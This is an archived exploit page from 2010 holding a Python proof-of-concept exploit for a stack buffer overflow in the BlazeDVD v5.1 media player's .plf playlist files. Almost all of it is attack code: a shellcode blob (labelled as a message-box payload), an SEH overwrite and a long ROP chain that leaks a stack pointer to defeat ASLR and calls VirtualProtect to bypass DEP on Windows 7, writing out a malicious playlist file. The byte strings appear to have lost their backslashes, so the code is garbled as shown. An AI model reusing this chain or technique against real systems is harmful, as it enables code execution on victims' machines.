BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ALS
Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================================== BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass ======================================================================== #!/usr/bin/python # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7 # Author: mr_me - https://net-ninja.net - mr_me[AT]corelan.be - @StevenSeeley # Download: http://www.blazevideo.com/ # Tested on windows 7 version N - DEP = AlwaysOn # Greetz: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # This PoC demonstates how we can bypass ASLR by stealing a # pointer off the stack and calculating the offset. # Then setup the VirtualProtect() call and execute it to bypass DEP as well. # All addresses are from ALSR non protected modules with BlazeDVD. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # write-up here: http://net-ninja.net/blog/?p=124 def banner(): print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] BlazeDVD v5.1 (plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7" # MessageBoxA - "mr_me defeats ASLR & DEP !" sc = ("xbfx3ax13x11xddxd9xc8x33xc9xb1x4bxd9x74x24" "xf4x5bx31x7bx14x83xebxfcx03x7bx10xd8xe6xc8" "x36x87xd0x9fxecx43xd3x8dx5fxd1x25xfbxc4xae" "x37xcbx8fxc6xbbxa0xe6x3ax4fxf0x0exc9x31xdd" "x85xfbxf5x52x82x76xf5x34xb3xa9x06x27xd3xc2" "x95x8cx30x5fx20xf1xb3x0bxaex71xc5x59x3bxcb" "xddx16x66xecxdcxc3x74xdbx97x98x4fxafx29x70" "x9ex50x18x4cx1dx02xdfx8cxaax51x21xc3x5ex67" "x66x32x91x98x97x3bx69x1bx4cxebxfbx3dx07xb1" "x27xc3xf3x23xa3xcfx48x20xe9xd3x4fxddx85xe8" "xc4x20x72x79x9ex06x9ex1bxdcxf4x96xf2x36x71" "x43x8dx75xe9x02xc0x77x05x48x35x1bx2ax92x3a" "xadx91x69x7exd0xc1x90xf3xaaxedx70xa6x5cx86" "x86xb9x62x11x3dx4exf5x4dxd2x6exfaxe5x19x5d" "x2ax91x35xd4x41x3cxb4x9exfax9ax32x16xe4xb4" "xbdx7dxedxb1x80x2ex56x69xa6x82x14xeexbbx38" "x37x18x9dxbfx48x27x4ax2dxefxf7xabxc5x2fxa3" "xcex74x58x39x78x03xe1xd5x29x8ex72x50xa6x3c" "x14xf4x16xd5x95x67x25x40x2bxacx41xd6x6fx47" "xdbx04x07x47xfax92xf8xefxdcx66xbcxbfx74x2b" "x6cx1fxa3xdbxe3x7fxeax48x6cx19x89x0fx18x8d" "x34xf0x84x28xdfx9dx36xedx72x6fx7ex99xc1xab" "x9ax10x38x82x48x70xe8xb4x3ex8bxdex06x7fx23" "x20x3dx77") junk = 'x43' * 312 ## This is where we land after our stack pivot ## rop2 = 'xe7x57x60x61' # 0x616057E7 : # MOV AX,100 # RETN rop2 += 'x41x41x41x41' # JUNK rop2 += 'x9fxa5x62x61' * 73 # 0x6162A59F : # ADD EAX,20 # POP EBX # RETN rop2 += 'x44' * (612-len(junk)-len(rop2)) seh = 'xaex74x60x61' # 0x616074AE : # ADD ESP,408 # RETN 4 ## leak ptr off the stack and calculate the offset for VirtualProtect() ## rop = 'x9fxa5x62x61' * 62 # 0x6162A59F : # ADD EAX,20 # POP EBX # RETN rop += 'xf0x8dx62x61' * 2 # 0x61628DF0 : # ADD EAX,0c # RETN rop += 'xe3xd8x01x64' # 0x6401D8E3 : # POP EDI # RETN rop += 'x1bx10x10x64' # 0x6410101B : # POP ESI # RETN rop += 'x3bxf9x60x61' # 0x6160F93B : # MOV EBX,EAX # CALL EDI rop += 'x74x0cx32x60' # 0x60320C74 : # SUB EBP,EBX # OR ESI,ESI # RETN rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += 'xe1x67x01x64' # 0x640167E1 : # ADD EAX,EBP # RETN 2 rop += 'x4dxb2x10x64' # 0x6410B24D : # MOV EAX,DWORD PTR DS:[EAX] # RETN rop += 'x41x41' # JUNK --------------------------^^ rop += 'x3exa0x10x64' # 0x6410A03E : # MOV EDX,EBX # JMP SHORT NetReg.6410A083 --> # PPR # RETN 10 rop += 'x41x41x41x41' # JUNK (for the p/p/r) rop += 'x41x41x41x41' # JUNK (for the p/p/r) rop += 'x05x6cx02x64' # 0x64026C05 : # SUB EAX,EDX # RETN rop += 'x41x41x41x41' # JUNK ---------------------------------------------------------------^^ rop += 'x41x41x41x41' # JUNK rop += 'x41x41x41x41' # JUNK rop += 'x41x41x41x41' # JUNK rop += 'x05x6cx02x64' * 14 # 0x64026C05 : # SUB EAX,EDX # RETN rop += 'x24x41x60x61' * 88 # 0x61604124 : # ADD EAX,20 # RETN 4 rop += 'x41x41x41x41' # JUNK ------------------------^^ rop += 'x97x7dx03x64' * 6 # 0x64037D97 : # ADD EAX,-2 # RETN ## Setup the VirtualProtect() call ## rop += 'xa2x8bx60x61' # 0x61608BA2 : # XCHG EAX,EDX # RETN rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += 'x59x9fx03x64' * 6 # 0x64039F59 : # ADD EAX,0C # RETN rop += 'x97x7dx03x64' * 4 # 0x64037D97 : # ADD EAX,-2 # RETN rop += 'xa2x8bx60x61' # 0x61608BA2 : # XCHG EAX,EDX # RETN rop += 'x24x01x64x61' # 0x61640124 : # XCHG EAX,EBX # RETN rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN ## Calculate shellcode space ## rop += 'x59x9fx03x64' * 65 # 0x64039F59 : # ADD EAX,0C # RETN rop += 'x24x01x64x61' # 0x61640124 : # XCHG EAX,EBX # RETN rop += 'xe3xd8x01x64' # 0x6401D8E3 : # POP EDI # RETN rop += 'x1cx10x10x64' # 0x6410101C : # RETN (ROP NOP) rop += 'x7exa9x60x61' # 0x6160A97E : # XCHG EAX,EBP # RETN rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += 'x74x58x02x64' # 0x64025874 : # PUSH ESP # POP ESI # RETN rop += 'x60x8fx32x60' # 0x60328F60 : # MOV EAX,ESI # POP ESI # RETN 4 rop += 'x71x97x32x60' # 0x60329771 : # CALL EAX # JUNK --^^ rop += 'x59x9fx03x64' # 0x64039F59 : # ADD EAX,0C # RETN rop += 'x41x41x41x41' # JUNK ------------------------------------^^ rop += 'x59x9fx03x64' * 5 # 0x64039F59 : # ADD EAX,0C # RETN rop += 'xf1x2ax10x64' # 0x64102AF1 : # POP ECX # RETN rop += 'x80xb1x11x64' # 0x6411b180 : # A writeable location from .data rop += 'x7exa9x60x61' # 0x6160A97E : # XCHG EAX,EBP # RETN rop += 'x07x40x63x61' # 0x61634007 : # XCHG EAX,ESI # AND EAX,C95E0000 # RETN 0C rop += 'x31x08x62x61' # 0x61620831 : # PUSHAD # RETN nops = "x90" * 30 exploit = junk + rop2 + seh + rop + nops + sc print "[+] cst-blazedvd.pl exploit file created!" file=open('cst-blazedvd.plf','w') file.write(exploit) file.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
